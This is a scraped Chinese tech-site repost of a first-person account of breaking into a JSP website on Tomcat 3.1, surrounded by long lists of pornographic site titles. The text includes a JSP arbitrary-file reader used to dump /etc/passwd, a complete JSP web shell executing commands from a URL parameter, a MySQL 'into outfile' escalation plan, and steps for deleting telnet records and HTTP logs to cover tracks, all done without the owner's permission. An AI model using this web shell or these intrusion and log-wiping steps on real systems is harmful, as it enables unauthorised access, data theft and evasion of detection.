亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > JSP > 正文

現場紀實—如何入侵基于JSP的網站

2019-11-18 19:13:31
字體:
來源:轉載
供稿:網友

  很偶然的一個機會,瀏覽到一個網站,頁面清新讓人感覺很舒服。網站是用jsp開發的,出于個人愛好,我決定測試一下其系統的安全性。

telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]


  返回的結果如下:

HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; java 1.2.2; linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404

〈h1〉Error: 404〈/h1〉
〈h2〉Location: /CHINANSL〈/h2〉File Not Found〈br〉/CHINANSL


  獲得了運行的WEBServer的名稱“Tomcat 3.1”。記得曾經發現過這個版本的漏洞,并且post到bugtrap上去過。

  回憶一下,大概是通過“..”技術可以退出WEB目錄,于是:

http://target:8080/../../../../%00.jsp (不行)
http://target:8080/file/index.jsp (不行)
http://target:8080/index.JSP (不行)
http://target:8080/index.jsp%81 (不行)
http://target:8080/index.js%70 (不行)
http://target:8080/index.jsp%2581 (不行)
http://target:8080/WEB-INF/ (不行)


  看來安全狀況似乎還不錯,我們再來進行一下更深層的測試。Tomcat 3.1自帶了一個管理工具,可以查看WEB下的目錄及文件,并且可以添加context。于是嘗試:

http://target:8080/admin/


  管理員果然沒有刪除或禁止訪問這個目錄,從安全的角度說,這點應該算是一個比較重要的失誤。

  接著,點擊“VIEW ALL CONTEXT”按鈕,列出了WEB目錄下的一些文件和目錄的名稱,很快發現了一個上傳文件的組件,通過這個組件將一個JSP文件上傳到對方的WEB目錄里:

〈%@ page import="java.io.*" %〉
〈%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.}
}catch(IOException e){}
%〉


  然后執行:

http://target:8080/upload/test.jsp?file=/etc/passwd

 

  密碼出來了。接下來的過程是猜測密碼,沒有成功。不過,現在相當于有了一個SHELL,猜不出密碼可以先把IE當作SHELL環境。
  再寫一個JSP文件:

〈%@ page import="java.io.*" %〉
〈%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%〉


  然后把這個JSP再通過upload上傳,有SHELL了。

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(詳細結果這里就不列出來了)


  怎么獲得root權限呢?經過一番搜索發現系統安裝了MySQL,并且從JSP的源代碼中得到了MySQL的密碼,執行:

sqld"〉http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld


  顯示:

root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql


  系統是以root身份運行的MySQL。這時我思考了一下,既然知道了MySQL的密碼,那就可以寫一個SHELL程序,讓它創建一個表,然后將我的數據放到表中,再使用“select ... into outfile;”的辦法在系統上創建一個文件,讓用戶在執行su的時候,運行我的程序。(還記得apache.org有一次被入侵嗎?黑客就采用的這種辦法)。

  之后就比較簡單了,上傳bindshell之類的程序,運行、獲得nobody的權限,使用su root時幫忙創建的setuid shell讓自己成為root。

  但是,接下來已經實際操作,結果令人頗感意外:

http://target:8080/upload/cmd.jsp?cmd=id


  顯示:

uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)


  原來這個WEB SHELL本來就是ROOT!管理員的安全設置工作到底怎么做的?

http://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份運行的(不列出來了)


  剩下的事情:

  1、刪除我的telnet記錄。

  2、刪除http的日志。

  清除日志我使用的辦法是:cat xxx |grep -V "

  說明一點,我沒有更換該網站的頁面,因為我只是個網絡安全愛好者。所以,發封郵件告訴system admin吧!當然,我順便在信中提到,如果需要安盟信息科技為他提供安全服務的話,我們會非常的高興!


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美专区福利在线| 福利一区视频在线观看| 美女视频黄免费的亚洲男人天堂| 国产精品国语对白| 精品欧美国产一区二区三区| 亚洲天堂开心观看| 欧美午夜久久久| 92福利视频午夜1000合集在线观看| 久精品免费视频| 精品国产一区二区三区久久狼5月| 久久精品国产久精国产思思| 午夜精品视频在线| 91免费高清视频| 国内精品久久久久久久久| 亚洲午夜女主播在线直播| 久色乳综合思思在线视频| 黑人巨大精品欧美一区二区| 成人性生交大片免费看视频直播| 亚洲精品98久久久久久中文字幕| 亚洲性线免费观看视频成熟| 国产精品日韩一区| 欧美福利视频网站| 精品一区二区三区三区| 色久欧美在线视频观看| 91社影院在线观看| 日本成熟性欧美| 久久久精品999| 久久久之久亚州精品露出| 国产亚洲人成a一在线v站| 欧美成年人视频网站欧美| 久久人体大胆视频| 国产精品揄拍500视频| 国产成人精品av在线| 91精品视频播放| 黑人与娇小精品av专区| 91青草视频久久| 欧美午夜激情小视频| 亚洲一区二区久久久| 亚洲精品成人免费| 日韩电影免费观看中文字幕| 欧美一区三区三区高中清蜜桃| 51久久精品夜色国产麻豆| 日韩精品在线免费播放| 91亚洲精品久久久久久久久久久久| 国产suv精品一区二区| 亚洲第一区中文99精品| 亚洲天堂男人的天堂| 欧美在线视频一区二区| 国产精品视频精品视频| 91最新在线免费观看| 亚洲精品免费av| 91网在线免费观看| 亚洲色无码播放| 亚洲欧美在线第一页| 亚洲美女免费精品视频在线观看| 精品久久久香蕉免费精品视频| 成人福利网站在线观看| 欧美日韩国产精品一区二区不卡中文| 在线视频欧美日韩精品| 日韩av一卡二卡| 午夜精品国产精品大乳美女| 亚洲国产精品成人一区二区| 色综久久综合桃花网| 亚洲欧洲在线视频| 欧美国产视频日韩| 国产不卡av在线| 91国内揄拍国内精品对白| 国产91精品不卡视频| 国产精品日韩在线| 性欧美xxxx交| 国产福利精品在线| 国产精品久久久久久中文字| 国产精品久久久久久久久久久久| 国产97在线播放| 日韩一区av在线| 日韩av在线影院| 亚洲激情中文字幕| 精品国产999| 国产精品久久久久久久久久尿| 欧美又大粗又爽又黄大片视频| 亚洲第五色综合网| 亚洲精品福利在线| 久久福利视频网| 精品国产老师黑色丝袜高跟鞋| 精品欧美国产一区二区三区| 欧美日韩黄色大片| 亚洲аv电影天堂网| 成人免费在线网址| 久久中文字幕在线| 久久久久久久久久久免费精品| 国产精品日韩一区| 麻豆国产精品va在线观看不卡| 国产日韩在线精品av| 久久久久久欧美| 欧美一区亚洲一区| 亚洲一区第一页| 国产999精品久久久影片官网| 国产日韩精品入口| 亚洲综合社区网| 一夜七次郎国产精品亚洲| 欧美在线日韩在线| 久久久在线观看| www高清在线视频日韩欧美| 91亚洲国产成人精品性色| 日本午夜人人精品| 欧美男插女视频| 欧美精品久久久久久久免费观看| 欧洲亚洲在线视频| 2025国产精品视频| 一本色道久久88综合日韩精品| 欧美在线影院在线视频| 97激碰免费视频| 国产精品自产拍高潮在线观看| 911国产网站尤物在线观看| 欧美激情va永久在线播放| 欧美体内谢she精2性欧美| 国产自摸综合网| 久久久精品视频在线观看| 国产亚洲在线播放| 国产精品爽黄69| 国产精品91视频| 亚洲人午夜精品免费| xxxxx成人.com| 久久久国产一区| 亚洲色图17p| 91精品国产乱码久久久久久蜜臀| 欧美日韩亚洲激情| 欧美性资源免费| 日韩精品在线视频美女| 热久久视久久精品18亚洲精品| xx视频.9999.com| 欧美在线视频免费播放| 成人在线播放av| 色综合天天综合网国产成人网| 欧美国产日韩一区| 日本精品久久久| 国产精品久久久久久久久粉嫩av| 欧美日韩国产综合视频在线观看中文| 一区二区三区动漫| 在线观看国产精品日韩av| 国内精品400部情侣激情| 911国产网站尤物在线观看| 成人免费视频xnxx.com| 久久久之久亚州精品露出| 日韩成人激情影院| 一区二区三区www| 欧美在线视频导航| 亚洲一区二区三区成人在线视频精品| 亚洲理论片在线观看| 国产精品综合不卡av| 久久精品国产欧美亚洲人人爽| 人体精品一二三区| 久久影视免费观看| 欧美午夜电影在线| 欧美激情xxxx性bbbb| 久久人人爽亚洲精品天堂| 91日韩在线播放| 亚洲成人精品在线| 欧美精品在线免费| 国产成人精品综合久久久| 国产精品对白刺激| 日韩av中文在线| 伊人精品在线观看| 亚洲视频免费一区|